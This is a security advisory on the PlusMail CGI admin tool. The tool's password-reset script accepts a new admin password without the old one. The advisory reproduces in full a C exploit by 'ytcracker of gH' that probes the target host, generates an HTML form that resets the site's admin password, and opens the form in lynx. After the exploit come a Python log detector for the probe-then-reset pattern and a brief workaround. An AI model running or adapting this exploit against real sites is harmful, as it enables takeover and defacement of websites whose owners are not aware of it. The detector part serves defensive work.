COMMAND

    PlusMail

SYSTEMS AFFECTED

    PowerScripts PlusMail (All versions to current)

PROBLEM

    YT Cracker found the following (gH Security Advisory).  PlusMail is
    an extremely popular CGI-based administration tool that lets you
    take control of your website through a graphical control panel
    interface.  The password file, however, is installed with read/write
    permissions enabled, so anyone can change the password at will.  The
    following code detects the vulnerability and generates the HTML
    needed to exploit it.

    PlusMail has been seen running on multiple operating systems.  The
    vulnerability lies in the web-based tool itself, which, once
    exploited, gives "ADVANCED CONTROL" of the target website.  Below is
    the code by ytcracker of gH, which demonstrates how easily the HTML
    form can be generated and then submitted from a web browser to
    compromise the target host.  The PlusMail program is widely used, but
    the main PlusMail site has not yet been found, so the developers
    could not be notified of the remote vulnerability.

    Most likely this notice will be ripped out as the program is traded
    online, because script kids will not like this factual addition, but
    nevertheless it will be stated.  This exploit was written to
    acknowledge security weaknesses, but in no way promotes web page
    defacements.  If you further use this program to gain access to
    anything not normally accessible by yourself, meaning you script
    kids, then you are subject to prosecution and may even get 10 years
    in prison.  Is it honestly worth it to compile this program and
    randomly ./hack sites and deface them with this half-way automated
    program to put your nick & group on it?  The answer is NO.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int main(int argc, char *argv[])
    {
        int sock;
        ssize_t n;
        struct sockaddr_in sin;
        struct hostent *he;
        char *detect;
        char buffer[1024];
        FILE *html;

        /* Bare HTTP/1.0 probe for the CGI; a 404 in the reply means it is absent. */
        char plusvuln[] = "GET /cgi-bin/plusmail HTTP/1.0\r\n\r\n";

        /* Reset form: the script takes username/password/password1 together
           with new_login and never asks for the current password. */
        char htmI[] = "<html><head><title>[gH plusmail exploit]</title></head>"
                      "<body><form action=\"http://";
        char htmII[] = "/cgi-bin/plusmail\" method=\"post\">"
                       "<p>username: <input type=\"text\" name=\"username\"><br>"
                       "password: <input type=\"password\" name=\"password\"><br>"
                       "retype password: <input type=\"password\" name=\"password1\"></p>"
                       "<p><input type=\"submit\" name=\"new_login\" value=\"reset password\"></p>"
                       "</form><p><a href=\"http://pure-security.net\">Pure Security Networks</a></p>"
                       "</body></html>";

        printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");

        if (argc < 2) {
            printf(" usage: %s [vulnerable website]\n\n", argv[0]);
            exit(0);
        }

        if ((he = gethostbyname(argv[1])) == NULL) {
            herror("gethostbyname");
            exit(1);
        }

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            perror("socket");
            exit(1);
        }

        memset(&sin, 0, sizeof(sin));
        memcpy(&sin.sin_addr, he->h_addr, he->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);

        /* The original only reported a failed connect and carried on; bail out instead. */
        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
            perror("connect");
            exit(1);
        }

        send(sock, plusvuln, strlen(plusvuln), 0);

        /* recv() does not null-terminate, and strstr() needs a proper C string,
           so read one byte less than the buffer and terminate it ourselves. */
        n = recv(sock, buffer, sizeof(buffer) - 1, 0);
        if (n < 0)
            n = 0;
        buffer[n] = '\0';
        close(sock);

        /* Crude check: any "404" in the first read is taken as "script not there". */
        detect = strstr(buffer, "404");
        if (detect != NULL) {
            printf(" vulnerability not detected.\n");
            exit(0);
        }
        printf(" vulnerability detected.  generating html...\n");

        if ((html = fopen("plus.html", "w+b")) == NULL) {
            perror("fopen");
            exit(1);
        }
        fprintf(html, "%s", htmI);
        fprintf(html, "%s", argv[1]);
        fprintf(html, "%s", htmII);
        fclose(html);

        printf(" spawning lynx...\n");
        system("lynx plus.html");
        return 0;
    }

    The trailing system() call only hands the generated plus.html to
    lynx; the password reset itself is submitted from the browser.
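    From the defender's side, the scanner above leaves a recognisable trace: a bare
    "GET /cgi-bin/plusmail HTTP/1.0" with no headers (User-Agent logged as "-"),
    followed shortly by a POST to the same script from the same client. The
    following Python detector, added here as an example and not part of the
    advisory or of ytcracker's code, runs that pairing over constructed Apache
    combined-format log lines; the log format, the 600-second window and all IPs
    are assumptions for the example.

```python
import re
from datetime import datetime

# Apache "combined" log format (an assumption for this example). Sample lines below are constructed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
TARGET = "/cgi-bin/plusmail"

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def classify(rec):
    """Label one request: 'probe', 'probe-miss', 'reset-post' or None."""
    if rec["path"] != TARGET:
        return None
    # The published scanner sends a bare "GET /cgi-bin/plusmail HTTP/1.0" with no
    # headers at all (so User-Agent logs as "-") and only checks the reply for 404.
    if rec["method"] == "GET" and rec["proto"] == "HTTP/1.0" and rec["ua"] == "-":
        return "probe" if rec["status"] != "404" else "probe-miss"
    # Any POST to the script is a submission of the reset form (new_login).
    return "reset-post" if rec["method"] == "POST" else None

def find_reset_attempts(lines, window_s=600):
    """Return (ip, kind) alerts; probe then POST from one client within window_s is 'probe-then-reset'."""
    last_probe, alerts = {}, []
    for rec in filter(None, map(parse, lines)):
        label = classify(rec)
        if label == "probe":
            last_probe[rec["ip"]] = rec["ts"]
        elif label == "reset-post":
            t0 = last_probe.get(rec["ip"])
            hit = t0 is not None and (rec["ts"] - t0).total_seconds() <= window_s
            alerts.append((rec["ip"], "probe-then-reset" if hit else "reset-post"))
    return alerts

# Constructed sample: a scan-then-reset pair, a probe that got 404, an unrelated hit, a bare POST.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jan/2000:10:00:01 +0000] "GET /cgi-bin/plusmail HTTP/1.0" 200 512 "-" "-"',
    '203.0.113.7 - - [12/Jan/2000:10:00:40 +0000] "POST /cgi-bin/plusmail HTTP/1.0" 200 233 "-" "Lynx/2.8.2rel.1"',
    '198.51.100.4 - - [12/Jan/2000:10:05:00 +0000] "GET /cgi-bin/plusmail HTTP/1.0" 404 210 "-" "-"',
    '192.0.2.10 - - [12/Jan/2000:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.7"',
    '192.0.2.10 - - [12/Jan/2000:11:30:00 +0000] "POST /cgi-bin/plusmail HTTP/1.1" 200 233 "-" "Mozilla/4.7"',
]
```

    A POST without a preceding probe is still reported, since the form can be
    submitted from any browser once the host name is known.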

SOLUTION

    Move/rename the PlusMail directory as a temporary fix.